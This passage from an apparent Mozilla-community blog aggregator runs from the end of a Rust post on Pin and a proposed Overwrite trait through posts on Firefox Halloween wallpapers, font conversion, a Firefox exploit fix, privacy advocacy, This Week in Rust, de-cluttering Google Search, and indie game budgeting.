  • If F: Overwrite, then Pin<&mut F> is equivalent to &mut F. We showed in Theorem A that Pin<&mut O> could be upcast to &mut O and it is possible to create an &mut F from &mut O, so this must be safe.
  • If F: !Overwrite, then Pin<&mut F> refers to a pinned value found in o.f. The lemma tells us that the value in o.f will not be disturbed for the duration of the borrow.

EDIT: It was pointed out to me that this last theorem isn’t quite proving what it needs to prove. It shows that o.f will not be disturbed for the duration of the borrow, but to meet the pin rules, we need to ensure that the value is not swapped even after the borrow ends. We can do this by committing to never permit swaps of values unless T: Overwrite, regardless of whether they are borrowed. I meant to clarify this in the post but forgot about it, and then I made a mistake and talked about Swap – but Swap is the right name.

What part of this post are you most proud of?

Geez, I’m so glad you asked! Such a thoughtful question. To be honest, the part of this post that I am happiest with is the state diagram for places, which I’ve found very useful in helping me to understand Pin:

flowchart TD
Uninitialized 
Initialized
Pinned

Uninitialized --
    `p = v` where `v: T`
--> Initialized

Initialized -- 
    move out, drop, or forget
--> Uninitialized

Initialized --
    pin value `v` in `p`
    (only possible when `T` is `!Unpin`)
--> Pinned

Pinned --
    drop value
--> Uninitialized

Pinned --
    move out or forget
--> UB

Uninitialized --
    free the place
--> Freed

UB[💥 Undefined behavior 💥]
  

Obviously this question was just an excuse to reproduce it again. Some of the key insights that it helped me to crystallize:

  • A value that is Unpin cannot be pinned:
    • And hence Pin<&mut Self> really means “reference to a maybe-pinned value” (a value that is pinned if it can be).
  • Forgetting a value is very different from leaking the place that value is stored:
    • In both cases, the value’s Drop never runs, but only one of them can lead to a “freed place”.

In thinking through the stuff I wrote in this post, I’ve found it very useful to go back to this diagram and trace through it with my finger.

Is this backwards compatible?

Maybe? The question does not have a simple answer. I will address in a future blog post in this series. Let me say a few points here though:

First, the s/Unpin/Overwrite/ proposal is not backwards compatible as I described. It would mean for example that all futures returned by async fn are no longer Overwrite. It is quite possible we simply can’t get away with it.

That’s not fatal, but it makes things more annoying. It would mean there exist types that are !Unpin but which can be overwritten. This in turn means that Pin<&mut Self> is not a subtype of &mut Self for all types. Pinned mutable references would be a subtype for almost all types, but not those that are !Unpin && Overwrite.

Second, a naive, conservative transition would definitely be rough. My current thinking is that, in older editions, we add T: Overwrite bounds by default on type parameters T and, when you have a T: SomeTrait bound, we would expand that to include a Overwrite bound on associated types in SomeTrait, like T: SomeTrait<AssocType: Overwrite>. When you move to a newer edition I think we would just not add those bounds. This is kind of a mess, though, because if you call code from an older edition, you are still going to need those bounds to be present.

That all sounds painful enough that I think we might have to do something smarter, where we don’t always add Overwrite bounds, but instead use some kind of inference in older editions to avoid it most of the time.

Conclusion

My takeaway from authoring this post is that something like Overwrite has the potential to turn Pin from wizard level Rust into mere “advanced Rust”, somewhat akin to knowing the borrow checker really well. If we had no backwards compatibility constraints to work with, it seems clear that this would be a better design than Unpin as it is today.

Of course, we do have backwards compatibility constraints, so the real question is how we can make the transition. I don’t know the answer yet! I’m planning on thinking more deeply about it (and talking to folks) once this post is out. My hope was first to make the case for the value of Overwrite (and to be sure my reasoning is sound) before I invest too much into thinking how we can make the transition.

Assuming we can make the transition, I’m wondering two things. First, is Overwrite the right name? Second, should we take the time to re-evaluate the default bounds on generic types in a more complete way? For example, to truly have a nice async story, and for myraid other reasons, I think we need must move types. How does that fit in?


  1. The precise design of generators is of course an ongoing topic of some controversy. I am not trying to flesh out a true design here or take a position. Mostly I want to show that we can create ergonomic bridges between “must pin” types like generators and “non pin” interfaces like Iterator in an ergonomic way without explicit mentioning of pinning. ↩︎

  2. Boats has argued that, since no existing iterator can support borrows over a yield point, generators might not need to do so either. I don’t agree. I think supporting borrows over yield points is necessary for ergonomics just as it was in futures↩︎

  3. Actually for Pin<impl DerefMut<Target: Generator>>↩︎

  4. I will say, I use std::mem::forget quite regularly, but mostly to make up for a shortcoming in Drop. I would like it if Drop had a separate method, fn drop_on_unwind(&mut self), and we invoked that method when unwinding. Most of the time, it would be the same as regular drop, but in some cases it’s useful to have cleanup logic that only runs in the case of unwinding. ↩︎

  5. In contrast, a Pin<&mut T> reference can be safely converted into an &T reference, as evidenced by Pin’s Deref impl. This is because, even if T: !Unpin, a &T reference cannot do anything that is invalid for a pinned value. You can’t swap the underlying value or read from it. ↩︎

  6. Projection is the wonky PL term for “accessing a field”. It’s never made much sense to me, but I don’t have a better term to use, so I’m sticking with it. ↩︎

  7. We have a syntax k#foo for explicitly referred to a keyword foo. It is meant to be used only for keywords that will be added in future Rust editions. However, I sometimes think it’d be neat to internal-ish keywords (like k#pinned) that are used in desugaring but rarely need to be typed explicitly; you would still be able to write k#pinned if for whatever reason you wanted to. And of course we could later opt to stabilize it as pinned (no prefix required) in a future edition. ↩︎

  8. I tried asking ChatGPT to summarize the post but, when I pasted in my post, it replied, “The message you submitted was too long, please reload the conversation and submit something shorter.” Dang ChatGPT, that’s rude! Gemini at least gave it the old college try. Score one for Google. Plus, it called my post “thought-provoking!” Aww, I’m blushing! ↩︎

The Mozilla BlogIt’s Halloween — pick your spooky Firefox disguise

Halloween is creeping up on us, and this year, Firefox is getting into the spirit with a spooky twist: Our iconic fox has transformed into a lineup of eerie disguises.

The real magic, of course, is that Firefox helps keep your online identity safe all year long. But in the spirit of Halloween, we’ve created something special to help you celebrate the season – whether you’re refreshing your wallpaper or adding some Halloween flair to your socials. Check out Firefox’s spooky disguises.

Frankenfox 

<figcaption class="wp-element-caption">A patchwork fox brought to life, sewn from threads across the web. Credit: Michael Ham / Mozilla</figcaption>

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Mummy Fox

<figcaption class="wp-element-caption">Wrapped in mystery and ready to haunt your screen. Credit: Michale Ham / Mozilla</figcaption>

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper

Vampire Fox 

<figcaption class="wp-element-caption">Sharp, sleek and stylish – with a byte. Credit: Michael Ham / Mozilla</figcaption>

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Werefox

<figcaption class="wp-element-caption">A wild creature of the night, prowling the web. Credit: Michael Ham / Mozilla</figcaption>

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Witchfox

<figcaption class="wp-element-caption">Stirring up online magic with a wicked look. Credit: Michael Ham / Mozilla</figcaption>

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Zombie Fox

<figcaption class="wp-element-caption">Our classic fox with a dash of the undead, ready to haunt the web. Credit: Michael Ham / Mozilla</figcaption>

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

How to use

  1. Click and save your favorite from the links above. 
  2. Update your profile pictures, desktop and mobile wallpapers with our spooktacular designs.
  3. Tag us on social with #SpookyFirefox and let us know which Firefox disguise you’ve chosen to be this Halloween!

Whether you’re haunting your screen or casting a spell on your digital space, Firefox’s Halloween disguises are here to help you embrace the spirit of the season.

So, which spooky disguise will you choose this Halloween?

Get Firefox

Get the browser that protects what’s important

The post It’s Halloween — pick your spooky Firefox disguise appeared first on The Mozilla Blog.

Don Marticonvert TTF to WOFF2 on Fedora Linux

If you have a font in TTF (TrueType) format and need WOFF2 for web use, there is a woff2_compress utility packaged for Fedora (but still missing a man page and --help feature.) The package is woff2-tools.

sudo dnf install woff2-tools woff2_compress example.ttf

Also packaged for Debian: Details of package woff2 in sid

WOFF

For the older WOFF format (which I needed in order to have the font show up on a really old browser) the tool is sfnt2woff-zopfli.

Install and run with:

sudo dnf install sfnt2woff-zopfli sfnt2woff-zopfli example.ttf 

References

Converting TTF fonts to WOFF2 (and WOFF) - DEV Community (covers cloning and building from source)

How to Convert Font Formats to WOFF under Linux (compares several conversion tools)

Related

colophon (This site mostly uses Modern Font Stacks but has some Inconsolata.)

Bonus links

The AI bill Newsom didn’t veto — AI devs must list models’ training data From 2026, companies that make generative AI models available in California need to list their models’ training sets on their websites — before they release or modify the models. (The California Chamber of Commerce came out against this one, citing the technical difficulty in complying. They’re probably right, especially considering that under the CCPA, businesses are required to disclose inferences about people (PDF) and it’s hard to figure out which inferences are present in a large ML model.)

Antitrust challenge to Facebook’s ‘superprofiling’ finally wraps in Germany — with Meta agreeing to data limits Meta has to offer a cookie setting that allows Facebook and Instagram users’ data to decide whether they want to allow it to combine their data with other information Meta collects about them — via third-party websites where its tracking technologies are embedded or from apps using its business tools — or kept separate. but some of the required privacy+competition fixes must be Germany-only. (imho some US state needs a law that any privacy or consumer protection feature that a large company offers to users outside the US must also be available in that state.)

IAB, Others Urge Court To Reconsider Ruling That Curbed Section 230 10/10/2024 (Some background on this one: TikTok Inspired Child Suicide Prompts a Sound Reading of Section 230 The problem with this case from TikTok’s point of view is that Big Tech wants to keep claiming that its recommendation algorithms are somehow both the company’s own free speech and speech by users. But the Third Circuit is making them pick one. Given the Supreme Court’s observations that platforms engage in protected first-party speech under the First Amendment when they curate compilations of others’ content via their expressive algorithms, it follows that doing so amounts to first-party speech under § 230, too.)

California Privacy Act Sparks Website Tracking Technology Suits (This is a complicated one. Lawsuit accuses a company of breaking not one, not two, but three California privacy laws. And the California Constitution, too. Motion to dismiss mostly denied (PDF). Including a CCPA claim. Yes, there is a CCPA private right of action. CCPA claims survive a motion to dismiss where a plaintiff alleges that defendants disclosed plaintiff’s personal information without his consent due to the business’s failure to maintain reasonable security practices. In this case, Google Analytics tracking on a therapy site. I have some advice on how to get out in front of this kind of case, will share later.)

Digital Scams More Likely to Hurt Black and Latino Consumers - Consumer Reports Compounding the problem, experts believe, is that Black and Latino consumers are disproportionately targeted by a wide variety of digital scams. (This is a big reason why the I have nothing to hide argument about privacy doesn’t work. When a user who is less likely to be discriminated against chooses to participate in a system with personalization risks, that user’s information helps make user-hostile personalization against others work better. Privacy is a collective problem.)

ClassicPress: WordPress without the block editor [LWN.net] Once installed (or migrated), ClassicPress looks and feels like old-school WordPress.

Google never cared about privacy It was a bit of a tell how the DV360 product team demonstrated zero sense of urgency around making it easier for some buyers to test Privacy Sandbox, let alone releasing test results to prove it worked. The Chrome cookie deprecation delays, the inability of any ad tech expert or observer to convincingly explain how Google could possibly regulate itself — all of these deserve renewed scrutiny, given what we now know. (Google Privacy Sandbox was never offered as an option for YouTube, either. The point of janky in-browser ads is to make the slick YouTube ads, which have better reporting, look better to advertisers who have to allocate budget between open web and YouTube.)

Taylor Swift: Singer, Songwriter, Copyright Innovator [R]ecord companies are now trying to prohibit re-recordings for 20 or 30 years, not just two or three. And this has become a key part of contract negotiations. Will they get 30 years? Probably not, if the lawyer is competent. But they want to make sure that the artist’s vocal cords are not in good shape by the time they get around to re-recording.

Mozilla Security BlogBehind the Scenes: Fixing an In-the-Wild Firefox Exploit

At Mozilla, browser security is a critical mission, and part of that mission involves responding swiftly to new threats. Tuesday, around 8 AM Eastern time, we received a heads-up from the Anti-Virus company ESET, who alerted us to a Firefox exploit that had been spotted in the wild. We want to give a huge thank you to ESET for sharing their findings with us—it’s collaboration like this that keeps the web a safer place for everyone.

We’ve already released a fix for this particular issue, so when Firefox prompts you to upgrade, click that button. If you don’t know about Session Restore, you can ask Firefox to restore your previous session on restart.

The sample ESET sent us contained a full exploit chain that allowed remote code execution on a user’s computer. Within an hour of receiving the sample, we had convened a team of security, browser, compiler, and platform engineers to reverse engineer the exploit, force it to trigger its payload, and understand how it worked.

During exploit contests such as pwn2own, we know ahead of time when we will receive an exploit, can convene the team ahead of time, and receive a detailed explanation of the vulnerabilities and exploit. At pwn2own 2024, we shipped a fix in 21 hours, something that helped us earn an industry award for fastest to patch. This time, with no notice and some heavy reverse engineering required, we were able to ship a fix in 25 hours. (And we’re continually examining the process to help us drive that down further.)

While we take pride in how quickly we respond to these threats, it’s only part of the process. While we have resolved the vulnerability in Firefox, our team will continue to analyze the exploit to find additional hardening measures to make deploying exploits for Firefox harder and rarer. It’s also important to keep in mind that these kinds of exploits aren’t unique to Firefox. Every browser (and operating system) faces security challenges from time to time. That’s why keeping your software up to date is crucial across the board.

As always, we’ll keep doing what we do best—strengthening Firefox’s security and improving its defenses.

The post Behind the Scenes: Fixing an In-the-Wild Firefox Exploit appeared first on Mozilla Security Blog.

Mozilla Privacy BlogHow Lawmakers Can Help People Take Control of Their Privacy

At Mozilla, we’ve long advocated for universal opt-out mechanisms that empower people to easily assert their privacy rights. A prime example of this is Global Privacy Control (GPC), a feature built into Firefox. When enabled, GPC sends a clear signal to websites that the user does not wish to be tracked or have their personal data sold.

California’s landmark privacy law, the CCPA, mandates that tools like GPC must be respected, giving consumers greater control over their data. Encouragingly, similar provisions are emerging in other state laws. Yet, despite this progress, many browsers and operating systems – including the largest ones – still do not offer native support for these mechanisms.

That’s why we were encouraged by the advancement of California AB 3048, a bill that would require browsers and mobile operating systems to include an opt-out setting, allowing consumers to easily communicate their privacy preferences.

Mozilla was disappointed that AB 3048 was not signed into law. The bill was a much-needed step in the right direction.

As policymakers advance similar legislation in the future, there are small changes to the AB 3048 text that we’d propose, to ensure that the bill doesn’t create potential loopholes that undermine its core purpose and weaken existing standards like Global Privacy Control by leaving too much room for interpretation. It’s essential that rules prioritize consumer privacy and meet the expectations that consumers rightly have about treatment of their sensitive personal information.

Mozilla remains committed to working alongside California as the legislature considers its agenda for 2025, as well as other states and ultimately the U.S. Congress, to advance meaningful privacy protections for all people online. We hope to see legislation bolstering this key privacy tool reemerge in California, and advance throughout the US.

The post How Lawmakers Can Help People Take Control of Their Privacy appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdContributor Highlight: Toad Hall

We’re back with another contributor highlight! We asked our most active contributors to tell us about what they do, why they enjoy it, and themselves. Last time, we talked with Arthur, and for this installment, we’re chatting with Toad Hall.

If you’ve used Support Mozilla (SUMO) to get help with Thunderbird, Toad Hall may have helped you. They are one of our most dedicated contributors, and their answers on SUMO have helped countless people.

How and Why They Use Thunderbird

Thunderbird has been my choice of email client since version 3, so I have witnessed this product evolve and improve over the years. Sometimes, new design can initially derail you. Being of an older generation, I appreciate it is not necessarily so easy to adapt to change, but I’ve always tried to embrace new ideas and found that generally, the changes are an improvement.

Thunderbird offers everything you expect from handling several email accounts in one location, filtering, address books and calendar, plus many more functionalities too numerous to mention. The built in Calendar with its Events and Tasks options is ideal for both business and personal use. In addition, you can also connect to online calendars.  I find using the pop up reminders so helpful whether it’s notifying you of an appointment, birthday or that a TV program starts in 15 minutes!  Personally, I particularly impressed that Thunderbird offers the ability to modify the view and appearance to suit my needs and preferences.

I use a Windows OS, but Thunderbird offers release versions suitable for Windows, MAC and Linux variants of Operating Systems. So there is a download which should suit everyone.  In addition, I run a beta version so I can have more recent updates, meaning I can contribute by helping to test for bugs and reporting issues before it gets to a release version.

How They Contribute

The Thunderbird Support forum would be my choice as the first place to get help on any topic or query and there is a direct link to it via the ‘Help’ > ‘Get Help’ menu option in Thunderbird. As I have many years of experience using Thunderbird, I volunteer my free time to assist others in the Thunderbird Support Forum which I find a very rewarding experience. I have also helped out writing some Support Forum Help Articles. In more recent years I’ve assisted on the Bugzilla forum helping to triage and report potential bugs. So, people can get involved with Thunderbird in various ways.

Share Your Contributor Highlight (or Get Involved!)

Thanks to Toad Hall and all our contributors who have kept us alive and are helping us thrive!

If you’re a contributor who would like to share your story, get in touch with us at community@thunderbird.net. If you want to get involved with Thunderbird, read our guide to learn about all the ways to contribute.

The post Contributor Highlight: Toad Hall appeared first on The Thunderbird Blog.

Don Martidrinking games with the Devil

Should I get into a drinking game with the Devil? No, for three important reasons unrelated to your skill at the game.

  1. The Devil can out-drink you.

  2. The Devil can drink substances that are toxic to you even in small quantities.

  3. The Devil can cheat in ways that you will not be able to detect, and take advantage of rules loopholes that you might not understand.

What if I am really good at the skills required for the game? Still no. Even if you have an accurate idea of your own skill level, it is hard to estimate the Devil’s skill level. And even if you have roughly equally matched skills, the Devil still has the three advantages above.

What if I’m already in a drinking game with the Devil? I can’t offer a lot of help here, but I have read a fair number of comic books. As far as I can tell, your best hope is to delay playing and to delay taking a drink when required to. It is possible that some more powerful entity could distract the Devil in a way that results in the end of the game.

Bonus links

IAB, Others Urge Court To Reconsider Ruling That Curbed Section 230 (this is why the legit Internet is going to win. The lawyers needed to defend the blackout challenge are expensive, and a lot of state legislators will serve for gas money. As legislators learn to introduce more, and more diverse, laws on Big Tech the cost imbalance will become clearer.)

In the Trenches with State Policymakers Working to Pass Data Privacy Laws Former state representative from Oklahoma, Collin Walke, said that one tech company with an office in his state hired about 30 more lobbyists just to lobby on the privacy bill he was trying to pass.

Risks vs. Harms: Youth & Social Media Of course, there are harms that I do think are product liability issues vis-a-vis social media. For example, I think that many privacy harms can be mitigated with a design approach that is privacy-by-default. I also think that regulations that mandate universal privacy protections would go a long way in helping people out. But the funny thing is that I don’t think that these harms are unique to children. These are harms that are experienced broadly. And I would argue that older folks tend to experience harms associated with privacy much more acutely.

Google Search user interface: A/B testing shows security concerns remain For the past few days, Google has been A/B testing some subtle visual changes to its user interface for the search results page….Despite a more simplified look and feel, threat actors are still able to use the official logo and website of the brand they are abusing. From a user’s point of view, such ads continue to be as misleading.

Ukraine’s new F-16 simulator spotlights a ‘paradigm shift’ led from Europe (Europe isn’t against technology or innovation, they’re mainly just better at focusing on real problems.)

Firefox NightlySearch Improvements Are On Their Way – These Weeks in Firefox: Issue 169

Highlights

  • The search team is planning on enabling a series of improvements to the search experience this week in Nightly! This project is called “Scotch Bonnet”.
    • We would love to hear your feedback via bug reports! We will also create a Connect page shortly.
    • The pref is browser.urlbar.scotchBonnet.enableOverride for anyone who wants a sneak preview.
  • The New Tab team has added a new experimental widget which shows a vertical list of interesting stories across multiple cells of the story grid:
    • The new tab page in Firefox is shown. The grid of stories is shown below the default set of top sites, and includes a new "tall" widget that spans several grid cells. That tall widget lists several stories vertically.

      We’re testing out a vertical list of stories in regions where stories are enabled.

    • You can test this out in Nightly by setting browser.newtabpage.activity-stream.discoverystream.contextualContent.enabled to true in about:config
    • We will be running a small experiment with this new widget, slated for Firefox 132, for regions where stories are enabled.

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Henry Wilkes (they/them) [:henry-x]
  • Meera Murthy

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Fixed mild performance regression in load times when the user browses websites that are registered as default/built-in search engines (fixed in Nightly 132, and uplifted to Beta 131) – Bug 1916240
  • Fixed startup error hit by static themes using MV3 manifest.json files – Bug 1917613
  • The WebExtensions popup notification shown when an extension is hiding Firefox tabs (using the tabs.hide method) is now anchored to the extensions button – Bug 1920706
  • Fixed browser.search.get regression (initially introduced in ESR 128 through the migration to the search-config-v2) that made the faviconUrl be set to blob urls (not accessible to other extensions). This regression has been fixed in Nightly 132 and then uplifted to Firefox 131 and ESR 128
    • Thanks to Standard8 for fixing the regression!
WebExtension APIs
  • The storage.session API now logs a warning message to raise extension developer awareness that the storage.session quota is being exceeded on channels where it is not enforced yet (currently only enforced on nightly >= 131) – Bug 1916276

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam DeBeasi renamed the isRoot argument of getBrowsingContextInfo() to includeParentId to make the code easier to understand (bug).
  • Updates:
    • Thanks to jmaher for splitting the marionette job in several chunks (bug).
    • Julian fixed the timings for network events to be in milliseconds instead of microseconds (bug)
    • Henrik and Julian improved the framework used by WebDriver BiDi to avoid failing commands when browsing contexts are loading (bug, bug, bug)
    • Sasha updated the WebDriver BiDi implementation for cookies to use the network.cookie.CHIPS.enabled preference. The related workarounds will be removed in the near future. (bug)

Lint, Docs and Workflow

Migration Improvements

New Tab Page

  • We’re going to be doing a slow, controlled rollout to change the endpoints with which we fetch sponsored top sites and stories. This is part of a larger architectural change to unify the mechanism with which we fetch this sponsored content.

Search and Navigation

  • Scotch Bonnet (search UI update) Related Changes
    • General
      • Daisuke connected Scotch Bonnet to Nimbus 1919813
    • Intuitive Search Keywords
      • Mandy added telemetry for search restrict keywords 1917992
    • Unified Search Button
      • Dale improved the UI of the Unified Search Button by aligning it closer to the design 1908922
      • Daisuke made the Unified Search Button more consistent depending on whether it was in an open/closed state 1913234
    • Persisted Search
      • James changed Persisted Search to use a cleaner design in preparation for its use with the Unified Search Button. It now has a button on the right side to revert the address bar and show the URL. And the Persist feature works with non-default app provided engines  1919193, 1915273, 1913312
    • HTTPS Trimming
      • Marco changed it so keyboard focus immediately untrims an https address 1898155

This Week In RustThis Week in Rust 568

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is float8, an 8-bit float implementation.

llogiq is still pleased with his choice, but increasingly unhappy about the lack of suggestions.

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

437 pull requests were merged in the last week

Rust Compiler Performance Triage

One regression dominated this week (dealing with a correctness fix around type system caching that was deemed necessary), but it luckily did not produce large regressions in any benchmarks. Overall, performance still ended up relatively in the same place as the beginning of the week.

Triage done by @rylev. Revision range: c87004a1..e6c46db4

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.3% [0.1%, 1.0%] 63
Regressions ❌
(secondary)
1.1% [0.1%, 3.4%] 81
Improvements ✅
(primary)
-0.5% [-3.0%, -0.1%] 19
Improvements ✅
(secondary)
-0.5% [-1.5%, -0.1%] 46
All ❌✅ (primary) 0.1% [-3.0%, 1.0%] 82

2 Regressions, 3 Improvements, 7 Mixed; 3 of them in rollups 57 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo Language Team Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-09 - 2024-11-06 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I'm the wrong side of 45. I have zero interest in wasting any time that I might have left writing C from scratch. Writing Rust is pure joy. I can go from an idea to a working, tested, robust, published and packaged implementation in the time it would take me to even begin the first few lines of a C version. The tooling is beautiful, makes programming fun, and the end result usually outperforms the equivalent C. Once it builds I know it will run perfectly on all of the platforms I care about, and I don't have to go around manually testing on them to find all of the various platform and compiler quirks that will break it.

Jonathan Perkins on the NetBSD mailing list

Thanks to blonk for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don Martifix Google Search

I can’t quite get Google Search back to pre-enshittification, but this is pretty close.

Remove AI crap

This will probably make the biggest change in the layout. Makes the AI material and various other growth hacking stuff disappear from the top of search results pages so it’s easier to get to the normal links.

Start a blocklist

Some sites are better at SEO than at content and keep showing up in search results. This step doesn’t help the first time that a crap site comes up, but future searches on related topics tend to get better results as I block the over-SEOed sites to let the legit sites rise to the top.

  • Firefox: Personal Blocklist

  • Google Chrome: (There is supposed to be an extension like this for Google Chrome too, but I don’t have the link.)

This one gets better as my blocklist grows. If you try this one, be patient.

Turn off ad tracking

If you use Google Search with a Google Account, go to https://myadcenter.google.com/home and set Personalized Ads to Off. This probably won’t reduce the raw number of ads, but will make it harder for Google to match you with a deceptive ad targeted at you. (The scam ads are even impersonating Google now.)

Fix click tracking

Use ClearURLs to remove tracking redirects. (Original Google results were links to sites—now they’re links back to Google which redirects to the sites, collecting extra data from you and slowing down browsing by one step. ClearURLs restores the original behavior. (To me it feels faster but I haven’t done a benchmark.)

Block search ads

This is the next step to try if scam-looking search ads are still getting through.

The FBI recommends Use an ad blocking extension when performing internet searches. (Internet Crime Complaint Center (IC3) | Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users)

Right now the extension that is best at blocking search ads is uBlock Origin but it takes some work to set it up for blocking search ads but not ads on legit sites. I’ll post instructions when I get that working.

Turn off browser advertising features

These are not used much today, but turning these off will probably help you get cleaner (less personalized) search results in future, so might as well check them.

Bonus links

Hey Google, What’s The Chrome User Choice Mechanism Going To Look Like? (whatever the defaults are, I’ll figure out the right options and post here)

Smart TVs are like “a digital Trojan Horse” in people’s homes (Browsers are a relief after other devices)

Meta smart glasses can be used to dox anyone in seconds, study finds

Project Analyzing Human Language Usage Shuts Down Because ‘Generative AI Has Polluted the Data’

Adrian GaudebertHow much did Dawnmaker really cost?

About a year ago, I wrote a piece explaining how much we estimated making Dawnmaker would cost. Well, Dawnmaker is finished, so as promised, I'm going to revisit that and show you how much it actually cost to produce our game! Yay, more money talk!

In June 2023, I made a budget for Dawnmaker that projected the game would cost a total of 520k€ to make. A year later, I can announce that the total budget is around 320k€. Why such a big difference? Because we never managed to secure funding, and thus had to cut a lot of what we wanted to do. We did not hire a team for the production of the game, did not even do the production of the game, did not pay ourselves, and reduced our spending to the minimum.

I'm writing that the budget is 320k€, but that does not mean we actually spent that much money. The amount of money that transited through our bank account and was disbursed is about 95k€. The remaining 225k€ are my estimation for how much Arpentor Studio would have spent if Alexis and I had paid ourselves decent salaries for the whole duration of the project. So in a sense you could say that Dawnmaker only cost 95k€, and there's some truth to that, but it's also a lie. Our work has value and needs to be accounted for in budgeting. Because in the end, this is money that we lost by not doing something else that would have paid us.

Where did the money go?

So we spent 95k€ over the course of 2.5 years. Here are the main expense categories we had:

Dawnmaker budget breakdown

Even though we barely paid ourselves — we did for 4 months at a time when we thought we were getting a bunch of money, but ultimately did not — salaries are still the biggest category. If you include contracting, which is also paying people to work on our game, that makes up for 60% of the game's budget. The rest is split between Company spending (lawyers, accounting, etc.), events and travel (like going to the Game Camp every year), regular fee for online services (hosting, email, documentation) and a touch of hardware. Plus all the remaining small things that don't fit the other categories, like an ads campaign.

The financial outcome of Dawnmaker

320k€ is an incredibly big sum for such a small company, especially if you compare that to how much the game made. At the time of writing, about 6k€ made it into our bank account. Our players seem to really enjoy Dawnmaker, according to our 94% positive reviews on Steam, so I guess we can call it a critical success. But financially it's far from one: we need another 314k€ to break even!

One metric that I'm thinking about those days, as I prepare the next project, is the revenue per working day. On Dawnmaker, as of writing, Alexis and I made about 6€ per working day. That's less than one tenth of the minimal wage in France, and that's without counting the money that came out of our pockets — otherwise our revenue per day would be negative.

If you're reading this and you're thinking of starting a game studio, here's the biggest advice I can give you: start by making small games. Reduce the risk — the financial cost — by making games that are small, but take them to the finish line. You'll gain experience, you'll make yourself a portfolio that will be helpful to raise funding later, and if you will have a much better chance of having a decent revenue per working day. But I'll discuss this in more details in a future post.

Dawnmaker Characters update is available

Dawnmaker is 20% off!

Yesterday we released a major, free update for Dawnmaker, our solo turn-based strategy game. We've added 3 characters, each with their own deck and roster of buildings, as well as a ton of new content. To celebrate, we're discounting the game, 20% off for the next two weeks. If you want to experience our city building meets deckbuilding game, now is your time to get it!

Buy Dawnmaker on Steam Buy Dawnmaker on itch.io


This piece was initially sent out to the readers of our newsletter. Wanna join in on the fun? Head out to Dawnmaker's presentation page and fill the form. You'll receive regular stories about how we're making this game and the latest news of its development!

Join our community!

The Mozilla BlogSemicolon Books: A haven of independence and empowerment in Chicago

A smiling woman standing in front of a colorful mural at Semicolon Books, wearing a "LORDE" shirt and layered necklaces.<figcaption class="wp-element-caption">Danielle Moore is the founder of Semicolon Books in Chicago. Credit: Jesus J. Montero</figcaption>

A portrait of a man with curly dark hair and glasses, wearing a patterned shirt and a dark jacket, looking directly at the camera with a neutral expression.
Jesus J. Montero is an award-winning journalist and passionate storyteller. He’s known for his investigative work covering social justice, music and culture. Jesus J. is also a producer, curating dynamic experiences that highlight culture through storytelling and dialogue. You can follow him on Instagram at @JesusJMontero. Photo: Olivia Gatti

Danielle Moore is a woman on a mission. It shows in the carefully curated, outward-facing books that line the shelves of Semicolon Books in Chicago’s River West neighborhood.

As a lesbian Black woman in a world that often overlooks her, Danielle wanted to build a space where diverse voices are celebrated and independence thrives. “If I want to create it, I will,” she said. For her, that is the definition of independence.

